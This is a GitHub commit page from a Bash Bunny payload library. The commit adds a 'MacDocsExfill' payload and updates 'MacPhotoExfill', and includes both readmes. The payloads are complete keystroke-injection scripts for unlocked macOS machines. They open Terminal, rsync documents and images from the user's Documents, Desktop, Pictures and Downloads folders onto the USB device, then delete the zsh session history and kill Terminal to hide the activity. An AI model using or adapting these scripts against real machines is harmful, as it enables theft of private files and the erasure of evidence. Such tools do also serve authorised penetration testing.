Skip to content

Commit

Permalink
Update of MacPhotoExfill & Create MacDocsExfill (#588)
Browse files Browse the repository at this point in the history 
* Update readme.md

* Update payload.txt

* Create MacDocsExfill

* Delete MacDocsExfill

* Add files via upload
  • Loading branch information
@afsh4ck
afsh4ck authored Jun 10, 2023
1 parent 0279a82 commit 37a4d9b
Show file tree
Hide file tree
Showing 4 changed files with 165 additions and 27 deletions.
78 changes: 78 additions & 0 deletions payloads/library/exfiltration/MacDocsExfill/payload.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,78 @@
#!/bin/bash
#
# Title: MacDocsExfill
# Author: afsh4ck
# Version: 1.0
# Target: MacOS
# Category: Exfiltration
#
# Exfilter all the images from the principal folders on unlocked MacOS targets.
# Stashes them in /loot/MacDocsExfill
#
# Purple Setup
# Amber..............Attack Mode ON
# Green..............Finished

LED SETUP
ATTACKMODE HID STORAGE ECM_ETHERNET
GET TARGET_HOSTNAME
QUACK DELAY 1000

lootdir=loot/MacDocsExfill/$TARGET_HOSTNAME
mkdir -p /root/udisk/$lootdir

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2000

LED STAGE 1

QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Desktop;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads;
QUACK ENTER
QUACK STRING rsync -av Documents/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Documents ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
QUACK STRING rsync -av Desktop/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Desktop ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
QUACK STRING rsync -av Downloads/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Downloads ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER

# Ensure sincronization
sync

# Cleanup and delete proofs
LED STAGE 2
QUACK ENTER

# Eject BB storage
QUACK STRING diskutil eject /Volumes/BashBunny/
QUACK ENTER
QUACK DELAY 500

# Remove terminal history from current session (commands used in attack won't be visible with the history command)
QUACK STRING rm -r ~/.zsh_sessions
QUACK ENTER
QUACK DELAY 500

# Exit terminal
QUACK STRING killall Terminal
QUACK ENTER

LED FINISH
46 changes: 46 additions & 0 deletions payloads/library/exfiltration/MacDocsExfill/readme.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,46 @@
# Mac Docs Exfilter for the BashBunny

_______ ______ ______ __ __
| \ / \ / \ | \ | \
| $$$$$$$\| $$$$$$\| $$$$$$\ | $$ | $$
| $$ | $$| $$ | $$| $$ \$$______ \$$\/ $$
| $$ | $$| $$ | $$| $$ | \ >$$ $$
| $$ | $$| $$ | $$| $$ __ \$$$$$$/ $$$$\
| $$__/ $$| $$__/ $$| $$__/ \ | $$ \$$\
| $$ $$ \$$ $$ \$$ $$ | $$ | $$
\$$$$$$$ \$$$$$$ \$$$$$$ \$$ \$$


* Author: afsh4ck
* Version: 1.0
* Target: MacOS
* Tested on: Ventura 13.3.1
* Category: Exfiltration

# DESCRIPTION

Exfilter all the documents from the principal folders on unlocked MacOS targets.
Stashes them in /loot/MacDocsExfill/$hostname grouped in subfolders:

| Subfolder | Content |
| ------------------ | -------------------------------------------- |
| Documents | All the docs in /root/Documents folder |
| Desktop | All the docs in /root/Desktop folder |
| Downloads | All the docs in /root/Downloads folder |

# IMAGE FORMATS

| Format |
| ------------------ |
| .docx |
| .xlsx |
| .pdf |

# LED STATUS

| LED | Status |
| ------------------ | -------------------------------------------- |
| Green | Setup |
| Yellow Blink | Attack Mode ON |
| Purple Slow | Cleaning all proofs |
| Green Fixed | Finish |
45 changes: 31 additions & 14 deletions payloads/library/exfiltration/MacPhotoExfill/payload.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@
#
# Title: MacPhotoExfill
# Author: afsh4ck
# Version: 1.0
# Version: 1.1
# Target: MacOS
# Category: Exfiltration
#
Expand All @@ -27,7 +27,7 @@ QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2000

LED ATTACK
LED STAGE 1

QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents;
QUACK ENTER
Expand All @@ -37,33 +37,50 @@ QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Pictures;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads;
QUACK ENTER
QUACK STRING cp Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ;
QUACK STRING rsync -av Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ;
QUACK ENTER
QUACK STRING cp Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ;
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING cp Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ;
QUACK STRING wait;
QUACK ENTER
QUACK STRING cp Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ;
QUACK STRING rsync -av Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ;
QUACK ENTER
# We can control the time for the payload execution
QUACK DELAY 25000
QUACK CTRL C
# Cleanup and delete proofs
LED M SLOW
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
QUACK STRING rsync -av Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER
QUACK STRING rsync -av Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ;
QUACK ENTER
QUACK STRING echo "Please wait while the files are copied...";
QUACK ENTER
QUACK STRING wait;
QUACK ENTER

# Ensure sincronization
sync

# Cleanup and delete proofs
LED STAGE 2
QUACK ENTER

# Eject BB storage
QUACK STRING diskutil eject /Volumes/BashBunny/
QUACK ENTER
QUACK DELAY 500

# Remove terminal history from current session (commands used in attack won't be visible with the history command)
QUACK STRING rm -r ~/.zsh_sessions
QUACK ENTER
QUACK DELAY 500

# Exit terminal
QUACK STRING killall Terminal
QUACK ENTER
# Ensure sincronization
sync

LED FINISH
LED FINISH
23 changes: 10 additions & 13 deletions payloads/library/exfiltration/MacPhotoExfill/readme.md
View file
Original file line number Diff line number Diff line change
@@ -1,17 +1,14 @@
# Mac Photo Exfilter for the BashBunny


* ___ ___ ___ ___ ___ ___ ___
* / /\ / /\ / /\ /__/\ / /\ / /\ /__/|
* / /::\ / /:/_ / /:/_ \ \:\ / /::\ / /:/ | |:|
* / /:/\:\ / /:/ /\ / /:/ /\ \__\:\ / /:/\:\ / /:/ | |:|
* / /:/ /::\ / /:/ /:// /:/ /::\ ___ / /::\ / /:/ /::\ / /:/ ___ __| |:|
* /__/:/ /:/\:\/__/:/ /://__/:/ /:/\:\/__/\ /:/\:\/__/:/ /:/\:\/__/:/ / /\/__/\_|:|____
* \ \:\/:/__\/\ \:\/:/ \ \:\/:/ /:/\ \:\/:/__\/\ \:\/:/__\/\ \:\ / /:/\ \:\/:::::/
* \ \::/ \ \::/ \ \::/ /:/ \ \::/ \ \::/ \ \:\ /:/ \ \::/---
* \ \:\ \ \:\ \__\/ /:/ \ \:\ \ \:\ \ \:\/:/ \ \:\
* \ \:\ \ \:\ /__/:/ \ \:\ \ \:\ \ \::/ \ \:\
* \__\/ \__\/ \__\/ \__\/ \__\/ \__\/ \__\/
_______ __ __ ______ ________ ______ __ __
| \ | \ | \ / \| \ / \ | \ | \
| $$$$$$$\| $$ | $$| $$$$$$\\$$$$$$$$| $$$$$$\ | $$ | $$
| $$__/ $$| $$__| $$| $$ | $$ | $$ | $$ | $$ ______ \$$\/ $$
| $$ $$| $$ $$| $$ | $$ | $$ | $$ | $$| \ >$$ $$
| $$$$$$$ | $$$$$$$$| $$ | $$ | $$ | $$ | $$ \$$$$$$/ $$$$\
| $$ | $$ | $$| $$__/ $$ | $$ | $$__/ $$ | $$ \$$\
| $$ | $$ | $$ \$$ $$ | $$ \$$ $$ | $$ | $$
\$$ \$$ \$$ \$$$$$$ \$$ \$$$$$$ \$$ \$$


* Author: afsh4ck
Expand Down Expand Up @@ -47,4 +44,4 @@ Stashes them in /loot/MacPhotoExfill/$hostname grouped in subfolders:
| Green | Setup |
| Yellow Blink | Attack Mode ON |
| Purple Slow | Cleaning all proofs |
| Green Fixed | Finish |
| Green Fixed | Finish |

0 comments on commit 37a4d9b

Please sign in to comment.